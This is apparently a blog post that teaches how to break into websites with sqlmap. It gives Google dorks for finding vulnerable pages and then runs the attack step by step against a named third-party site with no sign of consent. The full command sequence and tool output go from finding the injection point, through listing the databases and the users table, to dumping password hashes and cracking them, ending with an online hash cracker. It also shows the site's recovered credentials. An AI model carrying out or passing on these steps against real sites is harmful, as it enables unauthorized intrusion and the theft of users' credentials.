Hello Guys !
I am Afghan Assassin as you all know and today i am going to teach =How to hack website with sqlmap in 5 min=
---------------------------------------------------------------------------------------------
Sometimes it will take more time! , So we use dorks for finding vulnerable MYSQL websites, you can search for SQL dorks on google, as example i use a dork :
news.php id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
---------------------------------------------------------------------------------------------
So, you will get results like below image :
http://www.calidus.ro/en/news.php?id=2
To find out if this site is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:
http://www.calidus.ro/en/news.php?id=2'
Now here you can see MYSQL ERROR :
Now for hacking it using sqlmap
Open your terminal:
Type :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs
---------------------------------------------------------------------------------------------
-u for your website URL and remove ' from end of URL, sqlmap for starting SQL attack, dbs for knowing about databases name
Then ENTER and you will see this :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:50:59
[09:50:59] [INFO] resuming back-end DBMS 'mysql'
[09:50:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 7272=7272
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
[09:51:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:51:00] [INFO] fetching database names
available databases [2]:
[*] caliduzb_calidussql
[*] information_schema
[09:51:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'
[*] shutting down at 09:51:00
Its different in other sites the difference is on database names and also if sqlmap asks you questions like [Y,n] , you just choose capital letter :
[Y,n] = Y
Now its time to attack on database for finding tables and columns then dump ...
Finding tables of database (dbs)
for that we use this command :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables
---------------------------------------------------------------------------------------------
Your result should be... :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:55:01
[09:55:01] [INFO] resuming back-end DBMS 'mysql'
[09:55:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 7272=7272
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
[09:55:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:55:03] [INFO] fetching tables for database: 'caliduzb_calidussql'
Database: caliduzb_calidussql
[50 tables]
+-------------------+
| about |
| about_de |
| about_en |
| categories |
| categories_de |
| categories_en |
| contact |
| contact_de |
| contact_en |
| customers |
| eco |
| eco_de |
| eco_en |
| faq |
| faq_de |
| faq_en |
| forum_answer |
| forum_question |
| galleries |
| gallery |
| gallery_de |
| gallery_en |
| gallery_images |
| imp |
| mission |
| mission_de |
| mission_en |
| news |
| news_de |
| news_en |
| pellets |
| pellets_de |
| pellets_en |
| prices |
| products |
| products_de |
| products_en |
| projects |
| projects_de |
| projects_en |
| special_offers |
| special_offers_de |
| special_offers_en |
| support |
| support_de |
| support_en |
| users |
| vizion |
| vizion_de |
| vizion_en |
+-------------------+
[09:55:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'
[*] shutting down at 09:55:03
---------------------------------------------------------------------------------------------
As you can see now we have information about tables so we have to know about users because we only need to hack it...
For that we use this command :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns
---------------------------------------------------------------------------------------------
Sometimes its users and sometimes PRIVILEGES and may be any other things just search for it and use brain a little :D
Now we have got info about users also
Your result should be like :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:01:47
[10:01:47] [INFO] resuming back-end DBMS 'mysql'
[10:01:47] [INFO] testing connection to the target URL
[10:01:48] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 7272=7272
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
[10:01:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[10:01:48] [INFO] fetching columns for table 'users' in database 'caliduzb_calidussql'
Database: caliduzb_calidussql
Table: users
[11 columns]
+-----------------------+--------------+
| Column | Type |
+-----------------------+--------------+
| logcode | varchar(100) |
| user_email | varchar(100) |
| user_id | mediumint(8) |
| user_last_confirm_key | varchar(40) |
| user_lastvisit | date |
| user_new_privmsg | tinyint(2) |
| user_password | varchar(40) |
| user_regdate | date |
| user_type | tinyint(2) |
| username | varchar(255) |
| username_clean | varchar(255) |
+-----------------------+--------------+
[10:01:48] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'
[*] shutting down at 10:01:48
---------------------------------------------------------------------------------------------
Now lets dump it means we can hack it now
By using this command :
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump
Your result should be :
---------------------------------------------------------------------------------------------
root@kali:~# sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:05:55
[10:05:55] [INFO] resuming back-end DBMS 'mysql'
[10:05:55] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2 AND 7272=7272
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2 AND SLEEP(5)
---
[10:05:57] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:05:57] [INFO] fetching columns 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] fetching entries of column(s) 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] analyzing table dump for possible password hashes
[10:05:57] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:04] [INFO] using hash method 'md5_generic_passwd'
[10:06:04] [INFO] resuming password 'marjan' for hash '122f961db675f6a45b998594471a990b'
[10:06:04] [INFO] resuming password 'root' for hash '63a9f0ea7bb98050796b649e85481845'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
---------------------------------------------------------------------------------------------
As you can see it asks for dictionary attack so default is pressing ENTER and waiting :D
Press ENTER
[10:07:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[10:07:48] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[10:07:48] [INFO] starting 4 processes
[10:08:03] [INFO] postprocessing table dump
Database: caliduzb_calidussql
Table: users
[3 entries]
+---------+-------------------------------------------+
| user_id | user_password |
+---------+-------------------------------------------+
| 1 | a0dbde9503e13437db0f854b0b72a73b |
| 8 | 63a9f0ea7bb98050796b649e85481845 (root) |
| 6 | 122f961db675f6a45b998594471a990b (marjan) |
+---------+-------------------------------------------+
[10:08:03] [INFO] table 'caliduzb_calidussql.users' dumped to CSV file '/usr/share/sqlmap/output/www.calidus.ro/dump/caliduzb_calidussql/users.csv'
[10:08:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'
[*] shutting down at 10:08:03
---------------------------------------------------------------------------------------------
DONE now we have got user and pass
two hash cracked but one more remaining
Now we are going to crack this hash free and online :)
Open your browser and search for :
https://hashkiller.co.uk/md5-decrypter.aspx
As you can see it :
Choose the hash that is not cracked yet, copy and paste it there like this:
(fill the captcha)
Now its done you have found user and pass
I hope you understand it correctly and if you have any problem you can contact me or leave a comment :) in next tutorials i will teach WAF & Finding admin panel
Keep visiting sharing and LIKE!
My gmail :
hamedmh346@gmail.com
Good bye...
No comments:
Post a Comment